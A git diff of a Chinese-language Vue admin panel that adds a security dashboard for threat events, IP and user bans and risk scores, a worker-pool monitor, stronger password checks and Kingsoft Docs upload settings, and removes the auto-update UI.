<el-descriptions-item label="内存">{{ dockerStats?.memory_usage || '-' }}</el-descriptions-item> <el-descriptions-item label="内存">{{ dockerStats?.memory_usage || '-' }}</el-descriptions-item>
<el-descriptions-item label="内存占比">{{ dockerStats?.memory_percent || '-' }}</el-descriptions-item> <el-descriptions-item label="内存占比">{{ dockerStats?.memory_percent || '-' }}</el-descriptions-item>
</el-descriptions> </el-descriptions>
<div class="divider"></div>
<div class="panel-head">
<div class="head-left">
<div class="head-text">
<div class="panel-title">截图线程池</div>
<div class="panel-sub app-muted">
活跃有执行环境{{ browserPoolActiveWorkers }} · 忙碌 {{ browserPoolBusyWorkers }} · 队列 {{ browserPoolQueueSize }}
</div>
</div>
</div>
<el-tag v-if="browserPoolStats?.server_time_cst" effect="light" type="info">{{ browserPoolStats.server_time_cst }}</el-tag>
</div>
<div class="tile-grid tile-grid--4">
<div class="tile">
<div class="tile-v">{{ browserPoolTotalWorkers }}</div>
<div class="tile-k app-muted"> Worker</div>
</div>
<div class="tile">
<div class="tile-v ok">{{ browserPoolActiveWorkers }}</div>
<div class="tile-k app-muted">活跃有执行环境</div>
</div>
<div class="tile">
<div class="tile-v">{{ browserPoolIdleWorkers }}</div>
<div class="tile-k app-muted">空闲无任务</div>
</div>
<div class="tile">
<div class="tile-v warn">{{ browserPoolQueueSize }}</div>
<div class="tile-k app-muted">队列等待</div>
</div>
</div>
<div class="divider"></div>
<div class="table-wrap">
<el-table :data="browserPoolWorkers" size="small" border>
<el-table-column prop="worker_id" label="Worker" width="90" />
<el-table-column label="状态" width="90">
<template #default="{ row }">
<el-tag :type="workerPoolStatusType(row)" effect="light">{{ workerPoolStatusLabel(row) }}</el-tag>
</template>
</el-table-column>
<el-table-column label="执行" width="90">
<template #default="{ row }">
<el-tag :type="workerRunTagType(row)" effect="light">{{ workerRunLabel(row) }}</el-tag>
</template>
</el-table-column>
<el-table-column label="任务" width="120">
<template #default="{ row }">
<span>{{ normalizeCount(row?.total_tasks) }}</span>
<span class="app-muted"> / </span>
<span :class="normalizeCount(row?.failed_tasks) ? 'err' : 'app-muted'">{{ normalizeCount(row?.failed_tasks) }}</span>
</template>
</el-table-column>
<el-table-column prop="browser_use_count" label="复用" width="90" />
<el-table-column prop="last_active_at" label="最近活跃" min-width="160" />
<el-table-column prop="browser_created_at" label="环境创建" min-width="160" />
</el-table>
</div>
</el-card> </el-card>
</el-col> </el-col>
@@ -593,21 +671,12 @@ onMounted(refreshAll)
<el-icon><Tools /></el-icon> <el-icon><Tools /></el-icon>
</div> </div>
<div class="head-text"> <div class="head-text">
<div class="panel-title">配置与更新</div> <div class="panel-title">配置概览</div>
<div class="panel-sub app-muted">定时/代理/并发与版本</div> <div class="panel-sub app-muted">定时 / 代理 / 并发</div>
</div> </div>
</div> </div>
<el-tag v-if="updateAvailable" effect="dark" type="warning">可更新</el-tag>
</div> </div>
<el-alert
v-if="updateStatusError"
type="info"
:closable="false"
:title="updateStatusError"
style="margin-bottom: 12px"
/>
<div class="config-grid"> <div class="config-grid">
<div class="config-item"> <div class="config-item">
<div class="config-k app-muted">定时任务</div> <div class="config-k app-muted">定时任务</div>
@@ -640,18 +709,6 @@ onMounted(refreshAll)
</div> </div>
</div> </div>
</div> </div>
<div class="divider"></div>
<div class="sub-title">版本信息</div>
<el-descriptions border :column="1" size="small">
<el-descriptions-item label="本地版本(commit)">{{ shortCommit(updateStatus?.local_commit) }}</el-descriptions-item>
<el-descriptions-item label="远端版本(commit)">{{ shortCommit(updateStatus?.remote_commit) }}</el-descriptions-item>
<el-descriptions-item label="最近检查时间">{{ updateStatus?.checked_at || '-' }}</el-descriptions-item>
<el-descriptions-item v-if="updateResult?.job_id" label="最近更新">
<span>job {{ updateResult.job_id }} / {{ updateResult?.status || '-' }}</span>
</el-descriptions-item>
</el-descriptions>
</el-card> </el-card>
</el-col> </el-col>
</el-row> </el-row>
@@ -956,6 +1013,10 @@ onMounted(refreshAll)
grid-template-columns: repeat(3, minmax(0, 1fr)); grid-template-columns: repeat(3, minmax(0, 1fr));
} }
.tile-grid--4 {
grid-template-columns: repeat(4, minmax(0, 1fr));
}
.tile { .tile {
border: 1px solid rgba(17, 24, 39, 0.08); border: 1px solid rgba(17, 24, 39, 0.08);
border-radius: 16px; border-radius: 16px;
@@ -1127,6 +1188,10 @@ onMounted(refreshAll)
grid-template-columns: repeat(2, minmax(0, 1fr)); grid-template-columns: repeat(2, minmax(0, 1fr));
} }
.tile-grid--4 {
grid-template-columns: repeat(2, minmax(0, 1fr));
}
.resource-grid { .resource-grid {
grid-template-columns: 1fr; grid-template-columns: 1fr;
} }

View File

@@ -0,0 +1,843 @@
<script setup>
import { computed, onMounted, ref } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus'
import {
banIp,
banUser,
cleanup,
clearIpRisk,
getBannedIps,
getBannedUsers,
getDashboard,
getIpRisk,
getThreats,
getUserRisk,
unbanIp,
unbanUser,
} from '../api/security'
const pageSize = 20
const activeTab = ref('threats')
const dashboardLoading = ref(false)
const dashboard = ref(null)
const threatsLoading = ref(false)
const threatItems = ref([])
const threatTotal = ref(0)
const threatPage = ref(1)
const threatTypeFilter = ref('')
const threatSeverityFilter = ref('')
const bansLoading = ref(false)
const bannedIps = ref([])
const bannedUsers = ref([])
const banTab = ref('ips')
const banDialogOpen = ref(false)
const banSubmitting = ref(false)
const banForm = ref({
kind: 'ip',
ip: '',
user_id: '',
reason: '',
duration_hours: 24,
permanent: false,
})
const riskTab = ref('ip')
const riskLoading = ref(false)
const riskIpInput = ref('')
const riskUserIdInput = ref('')
const riskResult = ref(null)
const riskResultKind = ref('')
const commonThreatTypes = [
'sql_injection',
'xss',
'path_traversal',
'command_injection',
'ssrf',
'scanner',
'bruteforce',
'csrf',
'xxe',
'file_upload',
]
function normalizeCount(value) {
const n = Number(value)
return Number.isFinite(n) ? n : 0
}
function scoreMeta(score) {
const n = Number(score || 0)
if (n >= 80) return { label: '高', type: 'danger' }
if (n >= 50) return { label: '中', type: 'warning' }
return { label: '低', type: 'success' }
}
function formatExpires(expiresAt) {
const text = String(expiresAt || '').trim()
return text ? text : '永久'
}
function payloadTooltip(row) {
const parts = []
if (row?.field_name) parts.push(`字段: ${row.field_name}`)
if (row?.rule) parts.push(`规则: ${row.rule}`)
if (row?.matched) parts.push(`匹配: ${row.matched}`)
if (row?.value_preview) parts.push(`值: ${row.value_preview}`)
return parts.length ? parts.join(' · ') : '-'
}
function pathText(row) {
const method = String(row?.request_method || '').trim()
const path = String(row?.request_path || '').trim()
const combined = `${method} ${path}`.trim()
return combined || '-'
}
const threatTypeOptions = computed(() => {
const seen = new Set(commonThreatTypes)
const recent = dashboard.value?.recent_threat_events || []
for (const item of recent) {
const t = String(item?.threat_type || '').trim()
if (t) seen.add(t)
}
for (const item of threatItems.value || []) {
const t = String(item?.threat_type || '').trim()
if (t) seen.add(t)
}
return Array.from(seen)
.sort((a, b) => a.localeCompare(b))
.map((t) => ({ label: t, value: t }))
})
const dashboardCards = computed(() => {
const d = dashboard.value || {}
return [
{ key: 'threat_events_24h', label: '最近24小时威胁事件', value: normalizeCount(d.threat_events_24h) },
{ key: 'banned_ip_count', label: '当前封禁IP数', value: normalizeCount(d.banned_ip_count) },
{ key: 'banned_user_count', label: '当前封禁用户数', value: normalizeCount(d.banned_user_count) },
]
})
const threatTotalPages = computed(() => Math.max(1, Math.ceil((threatTotal.value || 0) / pageSize)))
async function loadDashboard() {
dashboardLoading.value = true
try {
dashboard.value = await getDashboard()
} catch {
dashboard.value = null
} finally {
dashboardLoading.value = false
}
}
async function loadThreats() {
threatsLoading.value = true
try {
const params = {
page: threatPage.value,
per_page: pageSize,
}
if (threatTypeFilter.value) params.event_type = threatTypeFilter.value
if (threatSeverityFilter.value) params.severity = threatSeverityFilter.value
const data = await getThreats(params)
threatItems.value = data?.items || []
threatTotal.value = data?.total || 0
} catch {
threatItems.value = []
threatTotal.value = 0
} finally {
threatsLoading.value = false
}
}
async function loadBans() {
if (bansLoading.value) return
bansLoading.value = true
try {
const [ipsRes, usersRes] = await Promise.allSettled([getBannedIps(), getBannedUsers()])
bannedIps.value = ipsRes.status === 'fulfilled' ? ipsRes.value?.items || [] : []
bannedUsers.value = usersRes.status === 'fulfilled' ? usersRes.value?.items || [] : []
} finally {
bansLoading.value = false
}
}
async function refreshAll() {
await Promise.allSettled([loadDashboard(), loadThreats(), loadBans()])
}
function onThreatFilter() {
threatPage.value = 1
loadThreats()
}
function onThreatReset() {
threatTypeFilter.value = ''
threatSeverityFilter.value = ''
threatPage.value = 1
loadThreats()
}
function resetBanForm() {
banForm.value = {
kind: 'ip',
ip: '',
user_id: '',
reason: '',
duration_hours: 24,
permanent: false,
}
}
function openBanDialog(kind = 'ip', preset = {}) {
resetBanForm()
banForm.value.kind = kind === 'user' ? 'user' : 'ip'
if (banForm.value.kind === 'ip') {
banForm.value.ip = String(preset.ip || '').trim()
} else {
banForm.value.user_id = String(preset.user_id || '').trim()
}
if (preset.reason) banForm.value.reason = String(preset.reason || '').trim()
banDialogOpen.value = true
}
async function submitBan() {
const kind = banForm.value.kind
const reason = String(banForm.value.reason || '').trim()
const permanent = Boolean(banForm.value.permanent)
const durationHours = Number(banForm.value.duration_hours || 24)
if (!reason) {
ElMessage.error('原因不能为空')
return
}
if (kind === 'ip') {
const ip = String(banForm.value.ip || '').trim()
if (!ip) {
ElMessage.error('IP不能为空')
return
}
banSubmitting.value = true
try {
await banIp({ ip, reason, duration_hours: durationHours, permanent })
ElMessage.success('IP已封禁')
banDialogOpen.value = false
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
} finally {
banSubmitting.value = false
}
return
}
const userIdRaw = String(banForm.value.user_id || '').trim()
const userId = Number.parseInt(userIdRaw, 10)
if (!Number.isFinite(userId)) {
ElMessage.error('用户ID无效')
return
}
banSubmitting.value = true
try {
await banUser({ user_id: userId, reason, duration_hours: durationHours, permanent })
ElMessage.success('用户已封禁')
banDialogOpen.value = false
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
} finally {
banSubmitting.value = false
}
}
async function onUnbanIp(ip) {
const ipText = String(ip || '').trim()
if (!ipText) return
try {
await ElMessageBox.confirm(`确定解除对 IP ${ipText} 的封禁吗?`, '解除封禁', {
confirmButtonText: '解除',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
await unbanIp(ipText)
ElMessage.success('已解除IP封禁')
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
}
}
async function onUnbanUser(userId) {
const id = Number.parseInt(String(userId || '').trim(), 10)
if (!Number.isFinite(id)) return
try {
await ElMessageBox.confirm(`确定解除对 用户ID ${id} 的封禁吗?`, '解除封禁', {
confirmButtonText: '解除',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
await unbanUser(id)
ElMessage.success('已解除用户封禁')
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
}
}
function jumpToIpRisk(ip) {
const ipText = String(ip || '').trim()
if (!ipText) return
activeTab.value = 'risk'
riskTab.value = 'ip'
riskIpInput.value = ipText
queryIpRisk()
}
function jumpToUserRisk(userId) {
const idText = String(userId || '').trim()
if (!idText) return
activeTab.value = 'risk'
riskTab.value = 'user'
riskUserIdInput.value = idText
queryUserRisk()
}
async function queryIpRisk() {
const ip = String(riskIpInput.value || '').trim()
if (!ip) {
ElMessage.error('请输入IP')
return
}
riskLoading.value = true
try {
riskResult.value = await getIpRisk(ip)
riskResultKind.value = 'ip'
} catch {
riskResult.value = null
riskResultKind.value = ''
} finally {
riskLoading.value = false
}
}
async function queryUserRisk() {
const raw = String(riskUserIdInput.value || '').trim()
const userId = Number.parseInt(raw, 10)
if (!Number.isFinite(userId)) {
ElMessage.error('请输入有效的用户ID')
return
}
riskLoading.value = true
try {
riskResult.value = await getUserRisk(userId)
riskResultKind.value = 'user'
} catch {
riskResult.value = null
riskResultKind.value = ''
} finally {
riskLoading.value = false
}
}
function openBanFromRisk() {
if (!riskResult.value || !riskResultKind.value) return
if (riskResultKind.value === 'ip') {
openBanDialog('ip', { ip: riskResult.value?.ip, reason: '风险查询手动封禁' })
} else {
openBanDialog('user', { user_id: riskResult.value?.user_id, reason: '风险查询手动封禁' })
}
}
async function unbanFromRisk() {
if (!riskResult.value || !riskResultKind.value) return
if (riskResultKind.value === 'ip') {
await onUnbanIp(riskResult.value?.ip)
await queryIpRisk()
} else {
await onUnbanUser(riskResult.value?.user_id)
await queryUserRisk()
}
}
async function clearIpRiskScore() {
if (riskResultKind.value !== 'ip') return
const ipText = String(riskResult.value?.ip || '').trim()
if (!ipText) return
try {
await ElMessageBox.confirm(
`确定清除 IP ${ipText} 的风险分吗?\n\n清除风险分不会删除威胁历史也不会解除封禁。`,
'清除风险分',
{ confirmButtonText: '清除', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
if (riskLoading.value) return
riskLoading.value = true
try {
await clearIpRisk(ipText)
ElMessage.success('IP风险分已清零')
} catch {
// handled by interceptor
} finally {
riskLoading.value = false
}
await queryIpRisk()
}
const cleanupLoading = ref(false)
async function onCleanup() {
try {
await ElMessageBox.confirm(
'确定清理过期封禁记录,并衰减风险分吗?\n\n该操作不会影响仍在有效期内的封禁。',
'清理过期记录',
{ confirmButtonText: '清理', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
cleanupLoading.value = true
try {
await cleanup()
ElMessage.success('清理完成')
await refreshAll()
} catch {
// handled by interceptor
} finally {
cleanupLoading.value = false
}
}
onMounted(async () => {
await refreshAll()
})
</script>
<template>
<div class="page-stack">
<div class="app-page-title">
<h2>安全防护</h2>
<div class="toolbar">
<el-button @click="refreshAll">刷新</el-button>
<el-button type="warning" plain :loading="cleanupLoading" @click="onCleanup">清理过期记录</el-button>
<el-button type="primary" @click="openBanDialog()">手动封禁</el-button>
</div>
</div>
<el-row :gutter="12" class="stats-row">
<el-col v-for="it in dashboardCards" :key="it.key" :xs="24" :sm="8" :md="8" :lg="8" :xl="8">
<el-card shadow="never" class="stat-card" :body-style="{ padding: '14px' }">
<div class="stat-value">
<el-skeleton v-if="dashboardLoading" :rows="1" animated />
<template v-else>{{ it.value }}</template>
</div>
<div class="stat-label">{{ it.label }}</div>
</el-card>
</el-col>
</el-row>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<el-tabs v-model="activeTab">
<el-tab-pane label="威胁事件" name="threats">
<div class="filters">
<el-select
v-model="threatTypeFilter"
placeholder="类型"
style="width: 220px"
filterable
clearable
allow-create
default-first-option
>
<el-option label="全部" value="" />
<el-option v-for="t in threatTypeOptions" :key="t.value" :label="t.label" :value="t.value" />
</el-select>
<el-select v-model="threatSeverityFilter" placeholder="严重程度" style="width: 200px" clearable>
<el-option label="全部" value="" />
<el-option label="高风险(>=80)" value="high" />
<el-option label="中风险(50-79)" value="medium" />
<el-option label="低风险(<50)" value="low" />
</el-select>
<el-button type="primary" @click="onThreatFilter">筛选</el-button>
<el-button @click="onThreatReset">重置</el-button>
</div>
<div class="table-wrap">
<el-table :data="threatItems" v-loading="threatsLoading" style="width: 100%">
<el-table-column prop="created_at" label="时间" width="180" />
<el-table-column label="类型" width="170">
<template #default="{ row }">
<el-tag effect="light" type="info">{{ row.threat_type || 'unknown' }}</el-tag>
</template>
</el-table-column>
<el-table-column label="严重程度" width="120">
<template #default="{ row }">
<el-tag :type="scoreMeta(row.score).type" effect="light">
{{ scoreMeta(row.score).label }} ({{ row.score ?? 0 }})
</el-tag>
</template>
</el-table-column>
<el-table-column label="IP" width="150">
<template #default="{ row }">
<el-link v-if="row.ip" type="primary" :underline="false" @click="jumpToIpRisk(row.ip)">
{{ row.ip }}
</el-link>
<span v-else>-</span>
</template>
</el-table-column>
<el-table-column label="用户" width="120">
<template #default="{ row }">
<el-link
v-if="row.user_id !== null && row.user_id !== undefined"
type="primary"
:underline="false"
@click="jumpToUserRisk(row.user_id)"
>
{{ row.user_id }}
</el-link>
<span v-else>-</span>
</template>
</el-table-column>
<el-table-column label="操作路径" min-width="220">
<template #default="{ row }">
<el-tooltip :content="pathText(row)" placement="top" :show-after="300">
<span class="mono ellipsis">{{ pathText(row) }}</span>
</el-tooltip>
</template>
</el-table-column>
<el-table-column label="Payload预览" min-width="240">
<template #default="{ row }">
<el-tooltip :content="payloadTooltip(row)" placement="top" :show-after="300">
<span class="ellipsis">{{ row.value_preview || '-' }}</span>
</el-tooltip>
</template>
</el-table-column>
</el-table>
</div>
<div class="pagination">
<el-pagination
v-model:current-page="threatPage"
:page-size="pageSize"
:total="threatTotal"
layout="prev, pager, next, jumper, ->, total"
@current-change="loadThreats"
/>
<div class="page-hint app-muted"> {{ threatPage }} / {{ threatTotalPages }} </div>
</div>
</el-tab-pane>
<el-tab-pane label="封禁管理" name="bans">
<div class="toolbar">
<el-button @click="loadBans">刷新封禁列表</el-button>
<el-button type="primary" @click="openBanDialog()">手动封禁</el-button>
</div>
<el-tabs v-model="banTab" class="inner-tabs">
<el-tab-pane label="IP黑名单" name="ips">
<div class="table-wrap">
<el-table :data="bannedIps" v-loading="bansLoading" style="width: 100%">
<el-table-column label="IP" width="180">
<template #default="{ row }">
<el-link type="primary" :underline="false" @click="jumpToIpRisk(row.ip)">
{{ row.ip || '-' }}
</el-link>
</template>
</el-table-column>
<el-table-column prop="reason" label="原因" min-width="260" />
<el-table-column label="过期时间" width="190">
<template #default="{ row }">{{ formatExpires(row.expires_at) }}</template>
</el-table-column>
<el-table-column label="操作" width="120" fixed="right">
<template #default="{ row }">
<el-button size="small" type="danger" plain @click="onUnbanIp(row.ip)">解除</el-button>
</template>
</el-table-column>
</el-table>
</div>
</el-tab-pane>
<el-tab-pane label="用户黑名单" name="users">
<div class="table-wrap">
<el-table :data="bannedUsers" v-loading="bansLoading" style="width: 100%">
<el-table-column label="用户ID" width="180">
<template #default="{ row }">
<el-link type="primary" :underline="false" @click="jumpToUserRisk(row.user_id)">
{{ row.user_id ?? '-' }}
</el-link>
</template>
</el-table-column>
<el-table-column prop="reason" label="原因" min-width="260" />
<el-table-column label="过期时间" width="190">
<template #default="{ row }">{{ formatExpires(row.expires_at) }}</template>
</el-table-column>
<el-table-column label="操作" width="120" fixed="right">
<template #default="{ row }">
<el-button size="small" type="danger" plain @click="onUnbanUser(row.user_id)">解除</el-button>
</template>
</el-table-column>
</el-table>
</div>
</el-tab-pane>
</el-tabs>
</el-tab-pane>
<el-tab-pane label="风险查询" name="risk">
<el-tabs v-model="riskTab" class="inner-tabs">
<el-tab-pane label="IP查询" name="ip">
<div class="filters">
<el-input v-model="riskIpInput" placeholder="输入IP如 1.2.3.4" style="width: 260px" clearable />
<el-button type="primary" :loading="riskLoading" @click="queryIpRisk">查询</el-button>
</div>
</el-tab-pane>
<el-tab-pane label="用户查询" name="user">
<div class="filters">
<el-input v-model="riskUserIdInput" placeholder="输入用户ID如 123" style="width: 260px" clearable />
<el-button type="primary" :loading="riskLoading" @click="queryUserRisk">查询</el-button>
</div>
</el-tab-pane>
</el-tabs>
<el-card v-if="riskResult" shadow="never" :body-style="{ padding: '16px' }" class="sub-card">
<div class="risk-head">
<div class="risk-title">
<strong v-if="riskResultKind === 'ip'">IP: {{ riskResult.ip }}</strong>
<strong v-else>用户ID: {{ riskResult.user_id }}</strong>
<span class="app-muted">风险分</span>
<el-tag :type="scoreMeta(riskResult.risk_score).type" effect="light">
{{ riskResult.risk_score ?? 0 }}
</el-tag>
<el-tag v-if="riskResult.is_banned" type="danger" effect="light">已封禁</el-tag>
<el-tag v-else type="success" effect="light">未封禁</el-tag>
</div>
<div class="toolbar">
<el-button v-if="!riskResult.is_banned" type="primary" plain @click="openBanFromRisk">封禁</el-button>
<el-button v-else type="danger" plain @click="unbanFromRisk">解除封禁</el-button>
<el-button
v-if="riskResultKind === 'ip'"
type="warning"
plain
:loading="riskLoading"
@click="clearIpRiskScore"
>
清除风险分
</el-button>
</div>
</div>
<div class="table-wrap">
<el-table :data="riskResult.threat_history || []" v-loading="riskLoading" style="width: 100%">
<el-table-column prop="created_at" label="时间" width="180" />
<el-table-column label="类型" width="170">
<template #default="{ row }">
<el-tag effect="light" type="info">{{ row.threat_type || 'unknown' }}</el-tag>
</template>
</el-table-column>
<el-table-column label="严重程度" width="120">
<template #default="{ row }">
<el-tag :type="scoreMeta(row.score).type" effect="light">
{{ scoreMeta(row.score).label }} ({{ row.score ?? 0 }})
</el-tag>
</template>
</el-table-column>
<el-table-column label="操作路径" min-width="220">
<template #default="{ row }">
<el-tooltip :content="pathText(row)" placement="top" :show-after="300">
<span class="mono ellipsis">{{ pathText(row) }}</span>
</el-tooltip>
</template>
</el-table-column>
<el-table-column label="Payload预览" min-width="240">
<template #default="{ row }">
<el-tooltip :content="payloadTooltip(row)" placement="top" :show-after="300">
<span class="ellipsis">{{ row.value_preview || '-' }}</span>
</el-tooltip>
</template>
</el-table-column>
</el-table>
</div>
</el-card>
</el-tab-pane>
</el-tabs>
</el-card>
<el-dialog v-model="banDialogOpen" title="手动封禁" width="min(520px, 92vw)" @closed="resetBanForm">
<el-form label-width="120px">
<el-form-item label="类型">
<el-radio-group v-model="banForm.kind">
<el-radio-button label="ip">IP</el-radio-button>
<el-radio-button label="user">用户</el-radio-button>
</el-radio-group>
</el-form-item>
<el-form-item v-if="banForm.kind === 'ip'" label="IP">
<el-input v-model="banForm.ip" placeholder="例如 1.2.3.4" />
</el-form-item>
<el-form-item v-else label="用户ID">
<el-input v-model="banForm.user_id" placeholder="例如 123" />
</el-form-item>
<el-form-item label="原因">
<el-input v-model="banForm.reason" type="textarea" :rows="3" placeholder="请输入封禁原因" />
</el-form-item>
<el-form-item label="永久封禁">
<el-switch v-model="banForm.permanent" />
</el-form-item>
<el-form-item v-if="!banForm.permanent" label="持续(小时)">
<el-input-number v-model="banForm.duration_hours" :min="1" :max="8760" />
</el-form-item>
</el-form>
<template #footer>
<div class="dialog-actions">
<div class="spacer"></div>
<el-button @click="banDialogOpen = false">取消</el-button>
<el-button type="primary" :loading="banSubmitting" @click="submitBan">确认封禁</el-button>
</div>
</template>
</el-dialog>
</div>
</template>
<style scoped>
.page-stack {
display: flex;
flex-direction: column;
gap: 12px;
}
.toolbar {
display: flex;
gap: 10px;
align-items: center;
flex-wrap: wrap;
}
.stats-row {
margin-bottom: 2px;
}
.card {
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
}
.sub-card {
margin-top: 12px;
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
}
.stat-card {
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
box-shadow: var(--app-shadow);
}
.stat-value {
font-size: 22px;
font-weight: 800;
line-height: 1.1;
}
.stat-label {
margin-top: 6px;
font-size: 12px;
color: var(--app-muted);
}
.filters {
display: flex;
flex-wrap: wrap;
gap: 10px;
align-items: center;
margin-bottom: 12px;
}
.table-wrap {
overflow-x: auto;
}
.ellipsis {
display: inline-block;
max-width: 100%;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.mono {
font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
}
.pagination {
display: flex;
align-items: center;
justify-content: space-between;
gap: 10px;
margin-top: 14px;
flex-wrap: wrap;
}
.page-hint {
font-size: 12px;
}
.inner-tabs {
margin-top: 6px;
}
.risk-head {
display: flex;
align-items: flex-start;
justify-content: space-between;
gap: 12px;
margin-bottom: 12px;
flex-wrap: wrap;
}
.risk-title {
display: flex;
align-items: center;
gap: 10px;
flex-wrap: wrap;
}
.dialog-actions {
display: flex;
align-items: center;
gap: 10px;
}
.spacer {
flex: 1;
}
</style>

View File

@@ -8,6 +8,14 @@ const username = ref('')
const password = ref('') const password = ref('')
const submitting = ref(false) const submitting = ref(false)
function validateStrongPassword(value) {
const text = String(value || '')
if (text.length < 8) return { ok: false, message: '密码长度至少8位' }
if (text.length > 128) return { ok: false, message: '密码长度不能超过128个字符' }
if (!/[a-zA-Z]/.test(text) || !/\d/.test(text)) return { ok: false, message: '密码必须包含字母和数字' }
return { ok: true, message: '' }
}
async function relogin() { async function relogin() {
try { try {
await logout() await logout()
@@ -54,8 +62,9 @@ async function savePassword() {
ElMessage.error('请输入新密码') ElMessage.error('请输入新密码')
return return
} }
if (value.length < 6) { const check = validateStrongPassword(value)
ElMessage.error('密码至少6个字符') if (!check.ok) {
ElMessage.error(check.message)
return return
} }

View File

@@ -1,10 +1,10 @@
<script setup> <script setup>
import { computed, onBeforeUnmount, onMounted, ref } from 'vue' import { computed, onBeforeUnmount, onMounted, ref, watch } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus' import { ElMessage, ElMessageBox } from 'element-plus'
import { fetchSystemConfig, updateSystemConfig, executeScheduleNow } from '../api/system' import { fetchSystemConfig, updateSystemConfig, executeScheduleNow } from '../api/system'
import { fetchKdocsQr, fetchKdocsStatus, clearKdocsLogin } from '../api/kdocs'
import { fetchProxyConfig, testProxy, updateProxyConfig } from '../api/proxy' import { fetchProxyConfig, testProxy, updateProxyConfig } from '../api/proxy'
import { fetchUpdateLog, fetchUpdateResult, fetchUpdateStatus, requestUpdateCheck, requestUpdateRun } from '../api/update'
const loading = ref(false) const loading = ref(false)
@@ -18,6 +18,7 @@ const scheduleEnabled = ref(false)
const scheduleTime = ref('02:00') const scheduleTime = ref('02:00')
const scheduleBrowseType = ref('应读') const scheduleBrowseType = ref('应读')
const scheduleWeekdays = ref(['1', '2', '3', '4', '5', '6', '7']) const scheduleWeekdays = ref(['1', '2', '3', '4', '5', '6', '7'])
const scheduleScreenshotEnabled = ref(true)
// 代理 // 代理
const proxyEnabled = ref(false) const proxyEnabled = ref(false)
@@ -29,16 +30,25 @@ const autoApproveEnabled = ref(false)
const autoApproveHourlyLimit = ref(10) const autoApproveHourlyLimit = ref(10)
const autoApproveVipDays = ref(7) const autoApproveVipDays = ref(7)
// 自动更新 // 金山文档上传
const updateLoading = ref(false) const kdocsEnabled = ref(false)
const updateActionLoading = ref(false) const kdocsDocUrl = ref('')
const updateStatus = ref(null) const kdocsDefaultUnit = ref('')
const updateStatusError = ref('') const kdocsSheetName = ref('')
const updateResult = ref(null) const kdocsSheetIndex = ref(0)
const updateLog = ref('') const kdocsUnitColumn = ref('A')
const updateLogTruncated = ref(false) const kdocsImageColumn = ref('D')
const updateBuildNoCache = ref(false) const kdocsAdminNotifyEnabled = ref(false)
let updatePollTimer = null const kdocsAdminNotifyEmail = ref('')
const kdocsStatus = ref({})
const kdocsQrOpen = ref(false)
const kdocsQrImage = ref('')
const kdocsPolling = ref(false)
const kdocsStatusLoading = ref(false)
const kdocsQrLoading = ref(false)
const kdocsClearLoading = ref(false)
const kdocsActionHint = ref('')
let kdocsPollingTimer = null
const weekdaysOptions = [ const weekdaysOptions = [
{ label: '周一', value: '1' }, { label: '周一', value: '1' },
@@ -65,69 +75,32 @@ const scheduleWeekdayDisplay = computed(() =>
.map((d) => weekdayNames[Number(d)] || d) .map((d) => weekdayNames[Number(d)] || d)
.join('、'), .join('、'),
) )
const kdocsActionBusy = computed(
() => kdocsStatusLoading.value || kdocsQrLoading.value || kdocsClearLoading.value,
)
function normalizeBrowseType(value) { function normalizeBrowseType(value) {
if (String(value) === '注册前未读') return '注册前未读' if (String(value) === '注册前未读') return '注册前未读'
return '应读' return '应读'
} }
function shortCommit(value) { function setKdocsHint(message) {
const text = String(value || '').trim() if (!message) {
if (!text) return '-' kdocsActionHint.value = ''
return text.length > 12 ? `${text.slice(0, 12)}` : text return
}
async function loadUpdateInfo({ withLog = true } = {}) {
updateLoading.value = true
updateStatusError.value = ''
try {
const [statusRes, resultRes] = await Promise.all([fetchUpdateStatus(), fetchUpdateResult()])
if (statusRes?.ok) {
updateStatus.value = statusRes.data || null
} else {
updateStatus.value = null
updateStatusError.value = statusRes?.error || '未发现更新状态Update-Agent 可能未运行)'
}
updateResult.value = resultRes?.ok ? resultRes.data : null
const jobId = updateResult.value?.job_id
if (withLog && jobId) {
const logRes = await fetchUpdateLog({ job_id: jobId, max_bytes: 200000 })
updateLog.value = logRes?.log || ''
updateLogTruncated.value = !!logRes?.truncated
} else {
updateLog.value = ''
updateLogTruncated.value = false
}
} catch {
// handled by interceptor
} finally {
updateLoading.value = false
}
}
function startUpdatePolling() {
if (updatePollTimer) return
updatePollTimer = setInterval(async () => {
if (updateResult.value?.status === 'running') {
await loadUpdateInfo()
}
}, 5000)
}
function stopUpdatePolling() {
if (updatePollTimer) {
clearInterval(updatePollTimer)
updatePollTimer = null
} }
const time = new Date().toLocaleTimeString('zh-CN', { hour12: false })
kdocsActionHint.value = `${message} (${time})`
} }
async function loadAll() { async function loadAll() {
loading.value = true loading.value = true
try { try {
const [system, proxy] = await Promise.all([fetchSystemConfig(), fetchProxyConfig()]) const [system, proxy, kdocsInfo] = await Promise.all([
fetchSystemConfig(),
fetchProxyConfig(),
fetchKdocsStatus().catch(() => ({})),
])
maxConcurrentGlobal.value = system.max_concurrent_global ?? 2 maxConcurrentGlobal.value = system.max_concurrent_global ?? 2
maxConcurrentPerAccount.value = system.max_concurrent_per_account ?? 1 maxConcurrentPerAccount.value = system.max_concurrent_per_account ?? 1
@@ -142,6 +115,7 @@ async function loadAll() {
.map((x) => x.trim()) .map((x) => x.trim())
.filter(Boolean) .filter(Boolean)
scheduleWeekdays.value = weekdays.length ? weekdays : ['1', '2', '3', '4', '5', '6', '7'] scheduleWeekdays.value = weekdays.length ? weekdays : ['1', '2', '3', '4', '5', '6', '7']
scheduleScreenshotEnabled.value = (system.enable_screenshot ?? 1) === 1
